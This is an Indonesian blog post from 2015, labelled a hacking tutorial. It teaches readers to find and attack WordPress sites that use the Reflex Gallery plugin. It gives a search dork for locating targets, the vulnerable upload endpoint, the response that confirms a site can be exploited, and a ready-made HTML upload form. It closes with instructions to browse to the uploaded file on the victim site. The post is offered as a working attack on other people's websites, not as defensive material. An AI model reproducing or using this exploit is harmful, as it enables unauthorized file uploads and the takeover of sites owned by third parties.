Sabtu, 18 April 2015

- Add Comment

Assalamuallaikum ^_^

ok kita langsung saja ya :D

pertama kita cari target dengan dork berikut :

Dork : inurl:/wp-content/plugins/reflex-gallery/
( silakan dikembangkan lagi :v )





kalau sudah dapat target , masukan exploit berikut :
Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php

kalau vuln , maka akan ada tulisan : {"error":"No files were uploaded."}

kemudian buka notepad , dan pastekan script CSRF berikut :

<html> <title>Reflex-Gallery CSRF</title> <form method="POST" action="http://target-anda.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php" enctype="multipart/form-data" > <input type="file" name="qqfile"><br> <input type="submit" name="Submit" value="Pwn!"> </form> </html>


tulisan yang berwarna merah silakan ganti dengan target kalian ^_^

kalau sudah , save dengan exsentasi .html dan buka file CSRFnya dengan web browser

upload file kalian , dan klik Pwn!

kalau sukses akan seperti gambar berikut :


disini saya mengupload gambar saja :D

sekarang coba buka : http://target-anda.com/wp-content/uploads/nama file




haah :D

gimana ? mudahkan :)

ok , sekian artikel dari saya ^_^



Label:

HackingTutorial
Disclaimer: Gambar dan video artikel pada website ini terkadang berasal dari berbagai sumber media lain. Hak cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami disini.


EmoticonEmoticon